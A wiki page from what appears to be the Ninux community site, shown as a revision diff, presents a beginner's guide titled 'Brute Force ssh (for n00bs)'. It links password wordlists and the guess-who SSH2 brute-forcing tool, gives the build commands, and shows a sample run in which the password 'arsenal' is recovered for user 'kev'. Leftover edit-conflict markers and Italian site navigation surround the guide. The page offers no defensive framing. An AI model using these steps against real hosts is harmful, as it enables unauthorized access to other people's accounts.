Italiano English
Modifica History Actions

Differenze per "BruteForce_ssh_eng"

Le sedi di Ninux sono:

a Roma presso il FusoLab

  • Fusolab

a Pisa all'EigenLab

  • Eingelab

a Cosenza presso la sede dell'Hacklab Cosenza

  • HLCS

a Catanzaro presso la sede dell'Hacklab Catanzaro

  • HLCZ

a Firenze presso l'exfila

  • exfila

a Bologna presso il makerspace di RaspiBO

  • NinuxBO

Ninux.org partecipa al World IPv6 day

  • WorldIpv6Day

Differenze tra le versioni 1 e 7 (in 6 versioni)
Versione 1 del 2007-03-31 12:05:35
Dimensione: 875
Autore: ac3bf1
Commento:
Versione 7 del 2007-06-04 11:33:29
Dimensione: 2639
Autore: ClauzClauz
Commento: added to CategoryEnglishPages
Le cancellazioni sono segnalate in questo modo. Le aggiunte sono segnalate in questo modo.
Linea 1: Linea 1:
== Brute Force ssh (for n00bs) ==
Linea 3: Linea 5:

=== Required Files and programs ===

It is ''' NOT ''' required to download ALL files here. Please read ''' CAREFULLY! ''' [[BR]]
 * Choose ''' 1 ''' from the following: [[BR]]

   || [http://www.ac3bf1.org/files/sec/all_merged.tar.gz all_merged.tar.gz] || [http://www.ac3bf1.org/files/sec/all_merged.zip all_merged.zip] || ('''~20MB!''' - 67MB uncompressed) || - Several passwords ||
   || [http://www.ac3bf1.org/files/sec/common_merged.tar.gz common_merged.tar.gz] || [http://www.ac3bf1.org/files/sec/common_merged.zip common_merged.zip] || (~6.5MB - 18MB uncompressed) || - Selection of common passwords ||
Linea 4: Linea 15:

 * Required Program: [[BR]]
   [http://www.ac3bf1.org/files/sec/guess-who-0.44.tgz guess-who-0.44.tgz] (16.1 KB) - Linux program to Brute Force SSH [[BR]]
 * In case you would want to personalize your password files, the folowing is a Wind0ws utility to merge text files [[BR]]
   [http://www.ac3bf1.org/files/sec/uumerge.zip uumerge.zip] (55.1 KB) Wind0ws merging program [[BR]]
 * The following are to be chosen if you want to create personalized password files.
   [http://www.ac3bf1.org/files/sec/common.tar.gz common.tar.gz] | [http://www.ac3bf1.org/files/sec/common.zip common.zip] (35 files - 6322.2 KB) - Several passwords not merged '''(~6MB)''' [[BR]]
   [http://www.ac3bf1.org/files/sec/all.tar.gz all.tar.gz] | [http://www.ac3bf1.org/files/sec/all.zip all.zip] (46 files - 19130.5 KB) - Selection of common passwords not merged '''(~20MB!)''' [[BR]]

=== Procedure ===
Linea 28: Linea 50:

---- /!\ '''Edit conflict - other version:''' ----

----
CategoryEnglishPages

---- /!\ '''Edit conflict - your version:''' ----

----
CategoryEnglishPages

---- /!\ '''End of edit conflict''' ----

Brute Force ssh (for n00bs)

Guess-who is a password brute force utility for attacking Secure Shell Version 2 accounts. BR It is available from http://packetstormsecurity.org/ BR

Required Files and programs

It is NOT required to download ALL files here. Please read CAREFULLY! BR

BR

Procedure

Installation: BR Download to the desired directory BR 

tar -zxvf guess-who-0.44.tgz
make

BR Execution: BR 

[root@hacker guess-who]# ./b

guess-who SSH2 parallel passwd bruter (C) 2002 by krahmer@cs.uni-potsdam.de

Usage: ./b <-l login> <-h host> [-p port] <-1|-2> [-N nthreads] [-n ntries]
Use -1 for producer/consumer thread model, -2 for dumb parallelism. < Password file

Expected output: BR 

[root@hacker guess-who]# ./b -l kev -h l192.168.1.1 -p 22 -2 < /passwords.txt
(!)056 ][ 00013 ][ 00000004.307361 ][ kev ][ arsenal ]
[ 00061 ][ 00015 ][ 00000004.066396 ][ kev ][ e3d ]

As you can see the user kev has a password of arsenal BR

/!\ Edit conflict - other version:

CategoryEnglishPages

/!\ Edit conflict - your version:

CategoryEnglishPages

/!\ End of edit conflict

l'ultima modifica è del 2008-03-18 17:28:28, fatta da localhost